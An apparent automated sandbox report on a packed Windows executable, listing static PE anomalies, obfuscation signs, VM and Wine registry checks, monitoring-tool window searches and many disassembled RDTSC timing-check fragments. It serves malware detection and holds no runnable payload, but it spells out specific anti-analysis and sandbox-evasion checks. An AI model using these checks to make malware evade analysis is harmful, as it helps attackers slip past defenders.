Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1787392 > 1048576
Source: file.exe | Static PE information: Raw size of chbioofn is bigger than: 0x100000 < 0x19a800

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00366390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00366390
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x1c25f6 should be: 0x1bfeaa
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: chbioofn
              Source: file.exe | Static PE information: section name: gsyzfhio
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B8871 push esi; mov dword ptr [esp], ecx | 0_2_007B8B68
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push 128D4372h; mov dword ptr [esp], ebx | 0_2_00699899
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push ebx; mov dword ptr [esp], ecx | 0_2_0069989D
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push edx; mov dword ptr [esp], ebp | 0_2_006998AE
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push ebp; mov dword ptr [esp], 58ACD84Ch | 0_2_006998CF
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push 21D5D28Dh; mov dword ptr [esp], ecx | 0_2_006998E4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push ecx; mov dword ptr [esp], ebx | 0_2_0069994B
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069987D push ebx; mov dword ptr [esp], edx | 0_2_00699971
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079D81D push ebx; mov dword ptr [esp], 6FFF6F0Ch | 0_2_0079D873
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079D81D push 289675F7h; mov dword ptr [esp], ecx | 0_2_0079D8FA
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push edi; mov dword ptr [esp], 7FFDD651h | 0_2_00700014
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push 0DC4A0BFh; mov dword ptr [esp], esi | 0_2_00700070
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push edi; mov dword ptr [esp], ecx | 0_2_007000B4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push ebp; mov dword ptr [esp], eax | 0_2_00700159
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push esi; mov dword ptr [esp], ecx | 0_2_007001F5
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push edi; mov dword ptr [esp], ebx | 0_2_007001FB
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push eax; mov dword ptr [esp], edx | 0_2_007002E8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push 6F618C76h; mov dword ptr [esp], edx | 0_2_00700342
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push ebp; mov dword ptr [esp], eax | 0_2_0070034C
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push 19F06152h; mov dword ptr [esp], ebp | 0_2_00700360
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push 41040967h; mov dword ptr [esp], ebx | 0_2_00700379
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push ebx; mov dword ptr [esp], edx | 0_2_007003DC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push eax; mov dword ptr [esp], ebp | 0_2_00700410
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push 66ECFC12h; mov dword ptr [esp], edi | 0_2_00700478
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push ebx; mov dword ptr [esp], 27D90D5Dh | 0_2_0070047F
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push 35102AAEh; mov dword ptr [esp], ebp | 0_2_00700497
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push edx; mov dword ptr [esp], esp | 0_2_00700547
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push edx; mov dword ptr [esp], 032FEE2Ch | 0_2_007005A2
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push esi; mov dword ptr [esp], 6FF79FD9h | 0_2_007005B0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push eax; mov dword ptr [esp], edi | 0_2_007005BF
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E push esi; mov dword ptr [esp], eax | 0_2_007005D7
              Source: file.exe | Static PE information: section name: chbioofn entropy: 7.953525251128387

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00366390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00366390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25973
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FDD0 second address: 73FDDA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FDDA second address: 73FDE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FDE0 second address: 73FDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FE8F second address: 73FE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FE93 second address: 73FEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7403BF second address: 7403C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7403C4 second address: 7403CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408FF second address: 74091F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3874C2D1E3h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74091F second address: 74092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7411DF second address: 7411F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3874C2D1D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007F3874C2D1DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742261 second address: 742265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741A50 second address: 741A67 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F3874C2D1D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742265 second address: 74226B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741A67 second address: 741A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74226B second address: 742270 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741A6C second address: 741A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742BEE second address: 742C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F38751214B8h 0x00000011 jmp 00007F38751214B2h 0x00000016 nop 0x00000017 mov esi, ebx 0x00000019 mov esi, dword ptr [ebp+122D19DEh] 0x0000001f push 00000000h 0x00000021 mov esi, dword ptr [ebp+122D3597h] 0x00000027 push 00000000h 0x00000029 add dword ptr [ebp+122D306Ch], edx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 pop edi 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742C43 second address: 742C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742C47 second address: 742C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742C4D second address: 742C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3874C2D1D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7450A5 second address: 7450BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748149 second address: 748153 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3874C2D1DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A711 second address: 74A790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F38751214B7h 0x0000000e jmp 00007F38751214B1h 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F38751214A8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f cmc 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D197Bh], eax 0x0000003a push 00000000h 0x0000003c xchg eax, esi 0x0000003d jg 00007F38751214C5h 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 push edx 0x00000049 pop edx 0x0000004a popad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7434B2 second address: 7434B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7434B6 second address: 7434C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F38751214AEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C6F0 second address: 74C712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C712 second address: 74C71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C71A second address: 74C769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F3874C2D1D8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov bx, 3D34h 0x00000025 push 00000000h 0x00000027 mov di, cx 0x0000002a push 00000000h 0x0000002c mov edi, esi 0x0000002e mov dword ptr [ebp+124734F4h], esi 0x00000034 xchg eax, esi 0x00000035 jmp 00007F3874C2D1DFh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C769 second address: 74C76F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E765 second address: 74E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E76B second address: 74E77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F38751214A8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDDB second address: 74EDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDDF second address: 74EE6D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F38751214B4h 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+1244FF67h] 0x00000019 push 00000000h 0x0000001b mov ebx, esi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F38751214A8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 ja 00007F38751214A8h 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push esi 0x00000042 jnc 00007F38751214A6h 0x00000048 pop esi 0x00000049 jmp 00007F38751214B7h 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F38751214ADh 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EE6D second address: 74EE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EE71 second address: 74EE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750F69 second address: 750FD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F3874C2D1E6h 0x0000000e mov dword ptr [ebp+122D1B7Ah], edx 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F3874C2D1D8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 jmp 00007F3874C2D1E2h 0x00000036 or ebx, dword ptr [ebp+1244FF6Ch] 0x0000003c push 00000000h 0x0000003e xor edi, dword ptr [ebp+12467165h] 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push edx 0x0000004a pop edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750FD8 second address: 750FE2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7540EC second address: 7540F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7561CE second address: 7561D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7561D2 second address: 75622B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3874C2D1DCh 0x0000000c jl 00007F3874C2D1D6h 0x00000012 popad 0x00000013 nop 0x00000014 mov di, cx 0x00000017 mov dword ptr [ebp+122D1B02h], ebx 0x0000001d push 00000000h 0x0000001f or di, EFE5h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F3874C2D1D8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 adc edi, 0BE6184Bh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jnl 00007F3874C2D1D8h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75825F second address: 758263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758263 second address: 758269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758269 second address: 7582EF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F38751214A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F38751214BAh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F38751214A8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c or bl, 0000006Ch 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+124501E2h], eax 0x00000037 call 00007F38751214AAh 0x0000003c adc bx, 3306h 0x00000041 pop ebx 0x00000042 push 00000000h 0x00000044 mov bx, cx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jng 00007F38751214B6h 0x00000050 jmp 00007F38751214B0h 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7591B1 second address: 75922F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jmp 00007F3874C2D1DEh 0x00000011 pop edx 0x00000012 jmp 00007F3874C2D1E2h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F3874C2D1D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 jnc 00007F3874C2D1D9h 0x0000003b push 00000000h 0x0000003d je 00007F3874C2D1DCh 0x00000043 mov dword ptr [ebp+122D3468h], eax 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F3874C2D1DBh 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75922F second address: 75924F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F38751214B4h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A142 second address: 75A147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762BFA second address: 762C05 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F38751214A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C05 second address: 762C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 ja 00007F3874C2D1D6h 0x0000000c jmp 00007F3874C2D1E6h 0x00000011 je 00007F3874C2D1D6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007F3874C2D213h 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F3874C2D1D6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C40 second address: 762C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DA4 second address: 762DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DAA second address: 762DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762F68 second address: 762F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F3874C2D1D6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762F87 second address: 762F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7681AC second address: 7681B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D18C second address: 76D1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F38751214A6h 0x0000000a jns 00007F38751214A6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jl 00007F38751214A6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BFA4 second address: 76BFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C94D second address: 76C951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CBC0 second address: 76CBC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CD6F second address: 76CD77 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CEF2 second address: 76CEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D030 second address: 76D053 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F38751214B4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
